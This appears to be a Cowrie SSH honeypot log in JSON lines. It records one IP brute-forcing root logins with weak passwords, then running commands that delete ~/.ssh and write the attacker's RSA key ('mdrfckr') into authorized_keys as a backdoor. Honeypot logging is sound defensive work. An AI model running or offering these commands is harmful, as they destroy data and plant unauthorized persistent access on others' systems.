{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:21:16.906282Z","src_ip":"212.227.235.229","session":"57276ef9a654"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:21:16.907005Z","src_ip":"212.227.235.229","session":"57276ef9a654"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:21:16.907862Z","src_ip":"212.227.235.229","session":"57276ef9a654"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:21:17.209718Z","src_ip":"212.227.235.229","session":"57276ef9a654"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51412,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae731897e59f","protocol":"ssh","message":"New connection: 212.227.235.229:51412 (1.2.3.4:22) [session: ae731897e59f]","sensor":"my-vps","timestamp":"2025-09-08T23:21:17.332593Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:21:17.337850Z","src_ip":"212.227.235.229","session":"ae731897e59f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:21:17.470957Z","src_ip":"212.227.235.229","session":"ae731897e59f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:21:17.829515Z","src_ip":"212.227.235.229","session":"57276ef9a654"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:21:17.830195Z","src_ip":"212.227.235.229","session":"57276ef9a654"}
{"eventid":"cowrie.login.success","username":"root","password":"dark","message":"login attempt [root/dark] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:21:18.023539Z","src_ip":"212.227.235.229","session":"ae731897e59f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:21:18.138113Z","src_ip":"212.227.235.229","session":"57276ef9a654"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:21:18.138967Z","src_ip":"212.227.235.229","session":"57276ef9a654"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:21:18.352937Z","src_ip":"212.227.235.229","session":"ae731897e59f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:21:18.353620Z","src_ip":"212.227.235.229","session":"ae731897e59f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:21:18.354419Z","src_ip":"212.227.235.229","session":"ae731897e59f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49864,"dst_ip":"1.2.3.4","dst_port":22,"session":"57cc0182ebcf","protocol":"ssh","message":"New connection: 212.227.235.229:49864 (1.2.3.4:22) [session: 57cc0182ebcf]","sensor":"my-vps","timestamp":"2025-09-08T23:21:18.452801Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:21:18.453553Z","src_ip":"212.227.235.229","session":"57cc0182ebcf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:21:18.494026Z","src_ip":"212.227.235.229","session":"ae731897e59f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:21:18.784395Z","src_ip":"212.227.235.229","session":"ae731897e59f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:21:18.785103Z","src_ip":"212.227.235.229","session":"ae731897e59f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:21:18.787404Z","src_ip":"212.227.235.229","session":"57cc0182ebcf"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:21:18.926870Z","src_ip":"212.227.235.229","session":"ae731897e59f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:21:18.927750Z","src_ip":"212.227.235.229","session":"ae731897e59f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51416,"dst_ip":"1.2.3.4","dst_port":22,"session":"7cb2b883aa6d","protocol":"ssh","message":"New connection: 212.227.235.229:51416 (1.2.3.4:22) [session: 7cb2b883aa6d]","sensor":"my-vps","timestamp":"2025-09-08T23:21:19.057625Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:21:19.058536Z","src_ip":"212.227.235.229","session":"7cb2b883aa6d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:21:19.197401Z","src_ip":"212.227.235.229","session":"7cb2b883aa6d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:21:19.790109Z","src_ip":"212.227.235.229","session":"7cb2b883aa6d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:21:20.060697Z","src_ip":"212.227.235.229","session":"57cc0182ebcf"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:21:20.935225Z","src_ip":"212.227.235.229","session":"7cb2b883aa6d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51430,"dst_ip":"1.2.3.4","dst_port":22,"session":"070d4698cce2","protocol":"ssh","message":"New connection: 212.227.235.229:51430 (1.2.3.4:22) [session: 070d4698cce2]","sensor":"my-vps","timestamp":"2025-09-08T23:21:21.067433Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:21:21.068026Z","src_ip":"212.227.235.229","session":"070d4698cce2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:21:21.205783Z","src_ip":"212.227.235.229","session":"070d4698cce2"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:21:21.375628Z","src_ip":"212.227.235.229","session":"57cc0182ebcf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49878,"dst_ip":"1.2.3.4","dst_port":22,"session":"71cc65d58919","protocol":"ssh","message":"New connection: 212.227.235.229:49878 (1.2.3.4:22) [session: 71cc65d58919]","sensor":"my-vps","timestamp":"2025-09-08T23:21:21.691678Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:21:21.692609Z","src_ip":"212.227.235.229","session":"71cc65d58919"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:21:21.788994Z","src_ip":"212.227.235.229","session":"070d4698cce2"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:21:21.927833Z","src_ip":"212.227.235.229","session":"070d4698cce2"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:21:21.928663Z","src_ip":"212.227.235.229","session":"ae731897e59f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:21:22.007667Z","src_ip":"212.227.235.229","session":"71cc65d58919"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:21:23.439390Z","src_ip":"212.227.235.229","session":"71cc65d58919"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:21:23.752098Z","src_ip":"212.227.235.229","session":"57276ef9a654"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:21:23.755905Z","src_ip":"212.227.235.229","session":"71cc65d58919"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43364,"dst_ip":"1.2.3.4","dst_port":22,"session":"bbb7e8295aa9","protocol":"ssh","message":"New connection: 212.227.235.229:43364 (1.2.3.4:22) [session: bbb7e8295aa9]","sensor":"my-vps","timestamp":"2025-09-08T23:21:34.570883Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:21:34.572024Z","src_ip":"212.227.235.229","session":"bbb7e8295aa9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:21:34.672571Z","src_ip":"212.227.235.229","session":"bbb7e8295aa9"}
{"eventid":"cowrie.login.success","username":"root","password":"dark","message":"login attempt [root/dark] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:21:35.116356Z","src_ip":"212.227.235.229","session":"bbb7e8295aa9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:21:35.395118Z","src_ip":"212.227.235.229","session":"bbb7e8295aa9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:21:35.396249Z","src_ip":"212.227.235.229","session":"bbb7e8295aa9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:21:35.397907Z","src_ip":"212.227.235.229","session":"bbb7e8295aa9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:21:35.500214Z","src_ip":"212.227.235.229","session":"bbb7e8295aa9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:21:35.770068Z","src_ip":"212.227.235.229","session":"bbb7e8295aa9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:21:35.770911Z","src_ip":"212.227.235.229","session":"bbb7e8295aa9"}
